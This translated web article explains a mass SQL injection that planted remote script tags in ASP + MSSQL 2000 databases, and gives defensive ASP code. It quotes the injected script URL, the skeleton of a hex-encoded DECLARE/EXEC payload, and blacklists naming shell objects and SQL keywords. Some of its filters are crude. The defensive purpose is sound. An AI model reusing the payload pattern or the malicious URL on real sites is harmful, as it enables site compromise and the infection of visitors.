ASP + MSSQL 2000: the database was injected with <script src=

Source: Internet
Author: User
Over the past few days, many websites built on ASP + MSSQL may have had JS inserted into their SQL database by a trojan. A friend's site was recently hit by hackers in exactly this way: every varchar and text field in MSSQL had a snippet of JS code automatically inserted into it. Even if you delete the code, unless the problem is fixed at its source, the JS code is automatically inserted into the database again a few minutes later.

From Flymorn's observation, this is probably carried out automatically by a program. The hackers first use search engines such as Google and Baidu to find sites built on ASP + MSSQL, then scan the whole site with injection scanning tools such as Ming. Once a SQL injection vulnerability or an upload vulnerability is found, the hackers do whatever it takes to upload their own full-featured web shell (a "big horse"), such as the Haiyang Trojan. The hackers then add the site to their list of compromised hosts ("chickens") and can add whatever JS code they want to the database at any time. This code often carries a large number of viruses and trojans, and ultimately the computers of users who visit the controlled site get infected.

A batch replace in SQL Query Analyzer can temporarily remove the inserted JS code, but unless the vulnerabilities of the whole site are fundamentally fixed, including the program and the server's security permissions, hackers can still break into your website's database at any time.

In SQL Query Analyzer, you can run the following statement to batch-replace the JS code:

UPDATE [table name] SET [field name] = REPLACE([field name], '<script src=http://c.n%75clear3.com/css/c.js></script>', '')

Flymorn carefully inspected the site and found several security issues with the site:

First, the site has an upload vulnerability. Uploading a file requires administrator authentication and the file format is also checked, but the administrator authentication relies on cookies, and cookies can be forged. And if an uploaded picture is accepted without any check of the file's contents, a picture trojan can very likely be uploaded as well.

Resolution: 1. Remove the file upload function (not very practical). 2. Change the upload user verification to session verification. 3. Verify the content of uploaded files and delete the file if it is a picture trojan. You can refer to the following validation code:

'=============== Check whether the uploaded file contains an illegal string: start ================
' FilePath is the virtual path of the file that was just uploaded
Set MyFile = Server.CreateObject("Scripting.FileSystemObject")
Set MyText = MyFile.OpenTextFile(Server.MapPath(FilePath), 1) ' 1 = ForReading: read the file as text
sTextAll = LCase(MyText.ReadAll)
MyText.Close
Set MyFile = Nothing
' Blacklisted substrings, all lower case because the file content was lower-cased above
sStr = "<%|.getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|.saveas|wscript.shell|script.encode|server.|.createobject|execute|activexobject|language="
sNoString = Split(sStr, "|")
For i = 0 To UBound(sNoString)
    If InStr(sTextAll, sNoString(i)) > 0 Then
        ' On the first match, delete the uploaded file and stop processing
        Set FileDel = Server.CreateObject("Scripting.FileSystemObject")
        FileDel.DeleteFile Server.MapPath(FilePath)
        Set FileDel = Nothing
        Response.Write("<script>alert('The file you uploaded has a problem, upload failed!');history.back();</script>")
        Response.End
    End If
Next
'================= Check whether the uploaded file contains an illegal string: end ===================

Second, the site has a cookie injection vulnerability. To reduce the load on the server, the program was designed so that all users are verified through cookies after logging in, and the cookies store the user's ID and NAME. Cookies are well known to be forged by hackers often; that is one problem. In addition, some external parameters are not read strictly through Request.Form and Request.QueryString; for simplicity, the form Request("id") is used instead.

We know that ASP's Request object first looks for the value in Form and QueryString, and if both are empty it goes on to take the value from Cookies. When designing programs we usually think about SQL injection through Request.Form and Request.QueryString, so those two are commonly filtered for SQL injection, but injection through cookies is forgotten. Look at the following SQL statement:

sql = "SELECT * FROM [table name] WHERE id=" & Request("id")

If this id happens to get its value from a cookie, think about how dangerous that is! The injector can easily forge a cookie named id, because the cookie for this id is assigned to it by the server. The cookie can be forged into a piece of code similar to the following:

DEcLaRe @s vArChAr(4000); SEt @s=cast(0x[long hex-encoded string omitted] as VArChAr(4000)); exec(@s);

Dizzy yet? This is SQL injection using hex encoding, which can bypass ordinary IDS validation. As long as the system has a SQL injection vulnerability, the code above will be executed: it uses a cursor to traverse all the tables and columns in the database and inserts the JS code into the columns.
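To see what such a request would actually execute, the hex string can be pulled out of a logged value and decoded. The script below is an added example, not code from the original article; its log lines are constructed and the hex in them decodes to a harmless SELECT 1.

```vbscript
' Added example, not from the original article.
' Run with: cscript //nologo decodehex.vbs  (the file name is an assumption)
Option Explicit

' Turn a string of hex digit pairs back into the text it encodes.
Function HexToText(hexDigits)
    Dim i, out
    out = ""
    For i = 1 To Len(hexDigits) - 1 Step 2
        out = out & Chr(CLng("&H" & Mid(hexDigits, i, 2)))
    Next
    HexToText = out
End Function

' Return the decoded SQL if the value carries a CAST(0x... AS VARCHAR)
' wrapper, otherwise an empty string. Matching ignores case, so the
' mixed-case spelling used to dodge naive filters is still caught.
Function DecodeHexCast(value)
    Dim re, matches, cleaned
    DecodeHexCast = ""
    cleaned = Unescape(Replace(value, "+", " "))   ' undo URL encoding first
    Set re = New RegExp
    re.IgnoreCase = True
    re.Pattern = "cast\s*\(\s*0x([0-9a-f]{8,})\s+as\s+n?varchar"
    Set matches = re.Execute(cleaned)
    If matches.Count > 0 Then
        DecodeHexCast = HexToText(matches(0).SubMatches(0))
    End If
    Set re = Nothing
End Function

' Constructed sample log values; 0x53454c4543542031 is "SELECT 1".
Dim samples, line, decoded
samples = Array( _
    "GET /show.asp id=12", _
    "GET /show.asp id=12;DeClArE%20@s%20vArChAr(4000);SeT%20@s=cAsT(0x53454c4543542031%20aS%20vArChAr(4000));eXeC(@s);--")
For Each line In samples
    decoded = DecodeHexCast(line)
    If decoded <> "" Then
        WScript.Echo "SUSPICIOUS: " & line
        WScript.Echo "  decodes to: " & decoded
    End If
Next
```

A payload delivered in a cookie, as described above, only appears in the web server log if the cookie field is enabled in the logging configuration.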

Solution: 1. Strictly filter the content obtained through Request.Form and Request.QueryString, and never obtain values in the Request("name") form; content stored in cookies should, as far as possible, not be used in SQL statements that query or operate on the database. 2. Use session validation for important user data wherever possible, because the session lives on the server side and the client cannot forge its data unless they have permissions on your server.
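A hardened form of the id lookup shown earlier, as an added example that is not part of the original article: it reads id from Request.QueryString only, accepts nothing but digits, and binds the value as an ADO parameter instead of concatenating it into the SQL text. The open connection conn, the table news and its columns are assumptions.

```vbscript
<%
' Added example, not from the original article.
' Assumptions: conn is an already-open ADODB.Connection; the table "news"
' and its columns "title" and "body" are hypothetical names.
Const adCmdText = 1
Const adInteger = 3
Const adParamInput = 1

' Read the id from the query string only, so a forged cookie named "id"
' is never consulted, and accept nothing but a plain decimal number.
Function GetNumericId()
    Dim raw, re
    raw = Trim(Request.QueryString("id"))
    Set re = New RegExp
    re.Pattern = "^\d{1,9}$"   ' IsNumeric would also accept values like 1e3 or &H10
    If re.Test(raw) Then
        GetNumericId = CLng(raw)
    Else
        GetNumericId = -1
    End If
    Set re = Nothing
End Function

Dim id, cmd, rs
id = GetNumericId()
If id < 0 Then
    Response.Status = "400 Bad Request"
    Response.End
End If

' Bind the value as a typed parameter; whatever the client sent can no
' longer change the structure of the statement.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT title, body FROM news WHERE id = ?"
cmd.Parameters.Append cmd.CreateParameter("id", adInteger, adParamInput, , id)
Set rs = cmd.Execute

If Not rs.EOF Then
    ' Encode on output so stored markup is displayed, not executed
    Response.Write Server.HTMLEncode(rs("title") & "")
End If
rs.Close
Set rs = Nothing
Set cmd = Nothing
%>
```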

You can filter SQL injection attempts with the following code, which guards against GET, POST and cookie injection:

<%
Response.Buffer = True ' Buffer the page
' Prevent GET injection
If Request.QueryString <> "" Then Call StopInjection(Request.QueryString)
' Prevent POST injection
If Request.Form <> "" Then Call StopInjection(Request.Form)
' Prevent cookie injection
If Request.Cookies <> "" Then Call StopInjection(Request.Cookies)

' Regular-expression check: tests every value in the given collection
Function StopInjection(Values)
    Dim regEx
    Set regEx = New RegExp
    regEx.IgnoreCase = True
    regEx.Global = True
    ' Matches a quote, semicolon or hash, or a SQL keyword preceded by whitespace, "+" or a bracket
    regEx.Pattern = "'|;|#|([\s\b+()]+(select|update|insert|delete|declare|@|exec|dbcc|alter|drop|create|backup|if|else|end|and|or|add|set|open|close|use|begin|return|as|go|exists)[\s\b+]*)"
    Dim sItem, sValue
    For Each sItem In Values
        sValue = Values(sItem)
        If regEx.Test(sValue) Then
            ' Stop the request as soon as one value matches
            Response.Write "<script language=javascript>alert('Illegal injection! Your actions have been recorded!!');history.back(-1);</script>"
            Response.End
        End If
    Next
    Set regEx = Nothing
End Function
%>

Save the above code as a file, for example antisql.asp, and include it at the top of the database connection file with <!--#include file="antisql.asp"-->. This applies the SQL injection protection to the entire site.

Third, strictly filter externally submitted data. Check the source page of each submission and reject it if it does not come from the current site. You can refer to the following code; the source URL can be forged, but a check like this will at least block malicious submissions that involve no technical skill:

<% ' Check the source and prohibit external submissions
Dim server_v1, server_v2
server_v1 = CStr(Request.ServerVariables("HTTP_REFERER"))
server_v2 = CStr(Request.ServerVariables("SERVER_NAME"))
' Reject if there is no referer, it is not the publish page, or its host (after "http://") is not this server
If server_v1 = "" Or InStr(server_v1, "Publish page name") <= 0 Or Mid(server_v1, 8, Len(server_v2)) <> server_v2 Then
    Response.Write "<script language=javascript>alert('Illegal source, external submissions are prohibited!');"
    Response.Write "this.location.href='vbscript:history.back()';</script>"
    Response.End
End If %>

Fourth, assign server permissions properly. For database permissions, give users the smallest permissions possible; if SA or administrator permissions are assigned, a successful attack will be a devastating blow. As for MSSQL port 1433, Flymorn suggests closing it when it is not in use.

In short, security is a comprehensive issue, and one small detail can destroy months or years of painstaking work. We must not only attend to every detail in the program, but also secure the server properly; users on virtual hosts also need to guard against cross-site attacks on the server. Details determine success or failure.
